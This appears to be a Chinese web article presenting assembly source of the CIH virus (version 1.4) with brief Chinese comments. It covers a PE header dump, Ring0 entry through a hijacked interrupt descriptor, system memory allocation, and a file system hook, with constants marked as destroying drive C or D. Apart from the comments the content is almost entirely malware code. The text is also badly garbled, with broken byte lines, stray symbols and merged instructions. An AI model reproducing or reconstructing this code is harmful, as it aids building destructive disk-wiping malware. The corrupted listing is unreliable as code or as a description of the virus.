病毒程式原始碼實例剖析-CIH病毒[2]
OriginalAppEXE SEGMENT
;PE格式可執行文件文件頭
FileHeader:
db 04dh, 05ah, 090h, 003, db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000,
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000,h
dbh000h, 000, 00h,000h 0h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h , 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001
db 021h, 0b8h, 01
db 021h, 0b8h, 001
db 021h, 0b8h, 015,
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 0200h 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh , 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h50, 000h, 000h, 000h, 000h,000, 0h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h , 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
, dbh 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h . 0h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h , 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000]h 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 0000, 000, 0h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 0000, 000h, 000h. 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000, 000, 0h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h , 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000,000 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000, 000, 0h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h , 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000,000 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074, 003〴 h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000,000, 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000,
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000,h
dbh000h, 000, 00h,000h 0h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h 000h 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
0 db 0h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h , 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 㟎 㟀OriginalAppEXE ENDS
; 病毒程式開始
TRUE = 1
FALSE = 0 ;標識其版本號為1.4版
MajorVirusVersion = 1 ;主版號
MinorVirusVersion = 4 ;次版本號
VirusVersion = MajorVirusVersion*10h+Minorrus ;是否調試
FirstKillHardDiskNumber = 81h ;破壞D盤
HookExceptionNumber = 05h ;使用5號中斷
ELSE
FirstKillHardDiskNumber = 80h ;破壞C盤
Hookx〠Number = 80h ;破壞C盤
Hookx〠Number = 0336d FileNameBufferSize = 7fh
;病毒程式碼段開始
VirusGame SEGMENT
VirusGame SEGMENT
ASS UMEame) , DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
🎀 MyVirusStart:
🎀 〜、rusStart:
『 異常處理,避免產生錯誤提示訊息
lea eax, [esp-04h* 2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0 eb 起始量
call @0 比用此偏移量+相對偏移量獲得絕對位址
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
〠
push eax
〠
push eax
『
sidt [esp-02h] ;取得中斷描述表的基址到ebx
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ;計算要用中斷的基址到ebx 🀜 mov ebp, [ebx] ;獲得異常處理的基地址
mov bp, [ebx-04h] ;取得入口
lea esi, MyExceptionHook-@1[ecx]
〜『 mov [ebx-04h], si ;
shr esi, 16 ;修改異常
mov [ebx+02h], si ;修改中斷基址使指向病毒中斷例程
pop esi 級中斷
pop 是方式進入Ring0級
ReturnAddressOfEndException = $
; 合併所有病毒代碼
push esi
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep病毒程式碼到分配好的系統記憶體首址
sub eax, 08h
mov esi, [eax]
or esi, esi 🎀 H jmp LoopOfMergeAllVirusCodeSection ;複製下一段
QuitLoopOfMergeAllVirusCodeSection:
pop esi『 HookExceptionNumber
; 保存異常處理
ReadyRestoreSE:
sti ;開中斷造
CLmp xor eb sti ;開中斷
; 當發生異常時,表示目前在Windows NT下,病毒將停止運行,直接跳到原來程式
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; 跳躍到原程序,正常執行
pop ebp
push 00401000h ; Push Original
棧 OriginalAddressOfEntryPoint = $48EntryPoint ;
;病毒初始化模組
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook; mov ecx, dr0 ;察看dr0是否有設定(dr0為病毒駐留標誌)
jecxz AllocateSystemMemoryPage ;沒有設置,則分配系統記憶體
add dword ptr [esp], ReadyRestoreSE-ReturnAddfEndEnd『 ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;恢復原來的中斷基址
iretd ;中斷返回
mov dr0, ebx ;設定病毒駐留的標誌dr0
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecxc •Acated ONG pType, ULONG VM, ULONG AlignMask, ULONG minPhys,
;ULONG maxPhys, ULONG *PhysAddr,ULONG flags);
push ecx ;
push ecx ;
push 000000001h ;
push 00000001h ;
push 000000001h ;
〜 push 000000001h ; _PageAllocate = $
dd 00010053h ;使用eax、ecx、edx和flags暫存器
add esp, 08h*04h ;恢復堆疊指標
xchg edi, ex
xchg ? ;eax指向病毒開始處
iretd ;退出中斷
; 初始化檔案系統鉤子
鎧.程式首址
push eax ;
int 20h ; Vxd呼叫IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h ;使用eax、ecwaxedx和flags 寄存器子程式首址到dr0
pop eax ;eax等於檔案系統鉤子程式首址
;保存原有的IFSMgr_InstallFileSystemApiHook功能呼叫的入口
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] ion) Hook的入口
mov OldInstallFileSystemApiHook-@3[eax], edx
; 修改IFSMgr_InstallFileSystemApiHook入口
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax; cli ;關中斷